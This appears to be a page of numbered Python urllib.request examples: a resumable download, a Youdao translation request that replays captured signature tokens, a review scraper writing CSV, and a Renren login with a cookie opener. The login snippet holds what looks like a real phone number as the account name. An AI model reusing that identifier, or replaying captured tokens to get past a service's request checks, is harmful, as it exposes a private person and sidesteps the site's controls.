        response = request.urlopen(request.Request(url, headers=headers), None)
        try:
            range_start = int(response.headers['content-range'][6:].split('/')
                              [0].split('-')[0])
            end_length = end = int(
                response.headers['content-range'][6:].split('/')[1])
            range_length = end_length - range_start
        except:
            range_length = int(response.headers['content-length'])

        if file_size != received + range_length:
            received = 0
            if bar:
                bar.received = 0
            open_mode = 'wb'

        with open(temp_filepath, open_mode) as output:
            while True:
                buffer = response.read(1024 * 256)
                if not buffer:
                    if received == file_size:  # Download finished
                        break
                    else:  # Unexpected termination. Retry request
                        headers['Range'] = 'bytes=' + str(received) + '-'
                        response = request.urlopen(
                            request.Request(url, headers=headers), None)
                output.write(buffer)
                received += len(buffer)
                if bar:
                    bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath), temp_filepath)

    if os.access(filepath, os.W_OK):
        os.remove(
            filepath
        )  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
Example #26
header = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'
}
url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'
# parameters to submit with the POST request
formdata = {
    'i': key,
    'from': 'AUTO',
    'to': 'AUTO',
    'smartresult': 'dict',
    'client': 'fanyideskweb',
    'salt': '15814112793734',
    'sign': 'b54a57150836a4b5aede88441e12a9c1',
    'ts': '1581411279373',
    'bv': '37074a7035f34bfbf10d32bb8587564a',
    'doctype': 'json',
    'version': '2.1',
    'keyfrom': 'fanyi.web',
    'action': 'FY_BY_REALTlME'
}
# URL-encode the form data
data = urllib.parse.urlencode(formdata).encode(encoding='utf-8')
# a request with a data argument is sent as POST; without it, as GET
req = request.Request(url, data=data, headers=header)
response = request.urlopen(req).read().decode()
# extract whatever appears between "tgt":" and "}]]
pat = r'"tgt":"(.*?)"}]]'
result = re.findall(pat, response)
print(result[0])
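
The snippet assumes that key (the text to translate) and several imports were set up earlier. A minimal, assumed preamble for running it could be:

import re
import urllib.parse
from urllib import request

key = 'hello'  # the text to translate; assumed, not part of the original excerpt

Note that salt, sign, ts and bv are a captured snapshot of one browser session, so Youdao may reject the request unless they are regenerated.
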
Example #27
#!/usr/bin/python3
"""
a Python script that takes in a URL and an email,
sends a POST request to the passed URL with the email as a parameter,
and displays the body of the response
"""

if __name__ == '__main__':
    from sys import argv
    from urllib import request, parse
    value = {'email': argv[2]}
    data1 = parse.urlencode(value)
    data = data1.encode("utf-8")
    req = request.Request(argv[1], data)
    with request.urlopen(req) as response:
        content = response.read()
        print(content.decode("UTF-8"))
def scrapeCompanyReviews(url, fileName):

    # list of reviews
    text = []
    header = []
    job_title = []
    currentFormer = []
    location = []
    date = []
    stars = []

    # whether to go to next page of reviews
    bool = True
    # current index of review
    start = 0

    while (bool):

        # get HTML
        req = lib.Request(url + '?start=' + str(start),
                          headers={'User-Agent': 'Mozilla/5.0'})
        webpage = lib.urlopen(req)
        soup = BeautifulSoup(webpage, 'html.parser')

        # find reviews
        current_text = soup.find_all('span',
                                     attrs={
                                         'class': 'cmp-review-text',
                                         'itemprop': 'reviewBody'
                                     })
        current_header = soup.find_all('div',
                                       attrs={'class': 'cmp-review-title'})
        current_job_title = soup.find_all('span',
                                          attrs={'class': 'cmp-reviewer'})
        current_location = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-location'})
        if (len(current_location) != len(current_header)):
            if (len(current_header) == 21):
                start += 20
                continue
            else:
                bool = False
                continue
        current_date = soup.find_all(
            'span', attrs={'class': 'cmp-review-date-created'})
        current_stars1 = soup.find_all('span',
                                       attrs={'class': 'cmp-Rating-on'})
        if (len(current_stars1) == 127):
            continue
        current_stars2 = [
            current_stars1[i] for i in range(len(current_stars1)) if i % 6 == 1
        ][:-1]
        current_stars = [
            str(int(i['style'][7:-4]) / 20) for i in current_stars2
        ]
        current_currentFormer = soup.find_all(
            'span', attrs={'class': 'cmp-reviewer-job-title'})
        current_currentFormer = [
            re.search('\(([^)]+)', i.text).group(1)
            for i in current_currentFormer
        ]
        current_currentFormer = [
            int(i == 'Current Employee') for i in current_currentFormer
        ]

        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(len(current_stars1))
            print(len(current_stars2))
            print(current_stars)
            print(current_location)

        if (len(current_text) != 21):
            bool = False

        # if second or more page, remove first review
        if (start != 0 and len(current_text) != 0):
            current_text.pop(0)
            current_header.pop(0)
            current_job_title.pop(0)
            current_location.pop(0)
            current_date.pop(0)
            current_stars.pop(0)
            current_currentFormer.pop(0)

        if (len(current_text) != len(current_stars) != len(current_location)):
            print(start)
            print([i.text.strip()[:10] for i in current_text])
            print(current_stars)
            print(current_location)

        # index to next page
        start += 20

        # add text to list
        for i in current_text:
            text.append(i.text.strip().encode('ascii',
                                              errors='ignore').decode())

        # add headers to list
        for i in current_header:
            header.append(i.text.strip().encode('ascii',
                                                errors='ignore').decode())

        # add job titles to list
        for i in current_job_title:
            job_title.append(i.text.strip().encode('ascii',
                                                   errors='ignore').decode())

        # add locations to list
        for i in current_location:
            location.append(i.text.strip().encode('ascii',
                                                  errors='ignore').decode())

        # add dates to list
        for i in current_date:
            date.append(i.text.strip().encode('ascii',
                                              errors='ignore').decode())

        # add stars to list
        for i in current_stars:
            stars.append(i)

        # add current/former-employee flags to list
        for i in current_currentFormer:
            currentFormer.append(i)

    with open(fileName, 'a', newline='') as csv_file:
        writer = csv.writer(csv_file)
        writer.writerow([
            "company", "date", "job_title", "CurrentEmployee", "location",
            "header", "text", "stars"
        ])
        print(len(date), len(job_title), len(currentFormer), len(location),
              len(header), len(text), len(stars))
        for i, v in enumerate(text):
            writer.writerow([
                re.search('cmp/(.*)/', url).group(1), date[i], job_title[i],
                currentFormer[i], location[i], header[i], text[i], stars[i]
            ])
Example #29
    def getRequest(self):

        return ur.Request(self.url_encoded,
                          data=self.data,
                          headers=self.header)
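
getRequest belongs to a class that is not shown. A hedged sketch of the kind of wrapper it might sit in; the class name and constructor below are assumptions based only on the attributes the method uses:

import urllib.request as ur
from urllib.parse import quote


class ApiCall:
    def __init__(self, url, data=None, header=None):
        # mirror the attributes getRequest() relies on
        self.url_encoded = quote(url, safe=':/?&=#')
        self.data = data
        self.header = header or {}

    def getRequest(self):
        return ur.Request(self.url_encoded,
                          data=self.data,
                          headers=self.header)
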
Example #30
url = 'http://www.renren.com/PLogin.do'
form_data = {
    'email': '18518753265',
    'password': '******',
}
# first URL-encode the form data, then convert it to bytes
form_data = parse.urlencode(form_data).encode('utf-8')
print(form_data)

# build the request
headers = {
    'User-Agent':
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
# create a Request object
req = request.Request(url, data=form_data, method="POST", headers=headers)

# send the request
response = opener.open(req)
print(response.status)

# for cookie in cookieJar:
#     print(cookie.name,cookie.value)

url = 'http://www.renren.com/965722397/profile'
headers = {
    'User-Agent':
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0',
}
# create a Request object
req = request.Request(url, headers=headers)
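
The opener used above is not defined in this fragment; the commented-out cookieJar loop suggests it was built with a cookie-aware handler. A sketch of that setup, as an assumption rather than the original code:

from http.cookiejar import CookieJar
from urllib import request

cookieJar = CookieJar()
opener = request.build_opener(request.HTTPCookieProcessor(cookieJar))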